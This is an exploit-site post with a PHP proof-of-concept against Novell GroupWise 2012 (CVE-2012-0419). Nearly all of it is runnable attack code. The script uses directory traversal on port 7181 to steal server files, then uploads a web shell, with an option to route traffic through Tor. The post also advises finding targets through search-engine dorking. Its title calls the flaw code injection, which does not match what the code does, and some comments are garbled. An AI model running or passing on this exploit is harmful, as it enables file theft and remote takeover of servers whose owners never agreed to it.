Novell GroupWise 2012 Traversal / Shell Upload
=============================================================================================================================================
| # Title Novell GroupWise 2012 Traversal / Shell Upload
=============================================================================================================================================
| # Title : Novell GroupWise 2012 before Support Pack 1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.novell.com/ |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Code Description: This code exploits the Directory Traversal vulnerability in Novell GroupWise to steal files, and attempts to upload a Web Shell payload if possible, making it an effective penetration testing tool.
( https://packetstorm.news/files/id/181042/ CVE-2012-0419 )
[+] save code as poc.php.
[+] Set Target : line 124
[+] USage : php poc.php
[+] PayLoad :
<?php
class NovellGroupwiseExploit {
private $target;
private $port;
private $filePath;
private $depth;
private $proxy;
private $useTor;
private $osList = ['Windows', 'Linux', 'MacOS'];
public function __construct($target, $port = 7181, $filePath = '/windows/win.ini', $depth = 10, $proxy = null, $useTor = false) {
$this->target = $target;
$this->port = $port;
$this->filePath = $filePath;
$this->depth = $depth;
$this->proxy = $proxy;
$this->useTor = $useTor;
}
private function sendRequest($url, $postData = null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
if ($this->proxy) {
curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
}
if ($this->useTor) {
curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
if ($postData) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
private function isGroupwise() {
$url = "http://{$this->target}:{$this->port}/";
$response = $this->sendRequest($url);
return strpos($response, 'GroupWise') !== false;
}
public function exploit() {
if (!$this->isGroupwise()) {
echo "[!] {$this->target}:{$this->port} - Not a GroupWise Agent HTTP Interface\n";
return;
}
foreach ($this->osList as $os) {
echo "[*] Checking for OS: $os\n";
}
$traversal = str_repeat("../", $this->depth) . ltrim($this->filePath, '/');
$url = "http://{$this->target}:{$this->port}/help/" . $traversal;
echo "[*] Sending request to $url ...\n";
$response = $this->sendRequest($url);
if ($response) {
$fileName = basename($this->filePath);
file_put_contents($fileName, $response);
echo "[+] File saved: $fileName\n";
} else {
echo "[!] Failed to retrieve file\n";
}
}
public function uploadPayload($payloadPath) {
$uploadUrl = "http://{$this->target}:{$this->port}/upload";
echo "[*] Attempting to upload payload to $uploadUrl ...\n";
$payload = file_get_contents($payloadPath);
if (!$payload) {
echo "[!] Failed to read payload file\n";
return;
}
$boundary = "----WebKitFormBoundary" . md5(time());
$data = "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($payloadPath) . "\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= $payload . "\r\n";
$data .= "--$boundary--\r\n";
$headers = [
"Content-Type: multipart/form-data; boundary=$boundary"
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uploadUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
if ($this->proxy) {
curl_setopt($ch, CURLOPT_PROXY, $this->proxy);
}
if ($this->useTor) {
curl_setopt($ch, CURLOPT_PROXY, '127.0.0.1:9050');
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
$result = curl_exec($ch);
curl_close($ch);
if ($result) {
echo "[+] Payload uploaded successfully!\n";
} else {
echo "[!] Failed to upload payload\n";
}
}
}
$target = '192.168.1.100'; // ?? ?????? ?????
$exploit = new NovellGroupwiseExploit($target, 7181, '/windows/win.ini', 10, 'http://127.0.0.1:8080', false);
$exploit->exploit();
// ????? ??? ?????
$payloadPath = 'shell.php'; // ?? ?????? ??? ???????
$exploit->uploadPayload($payloadPath);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================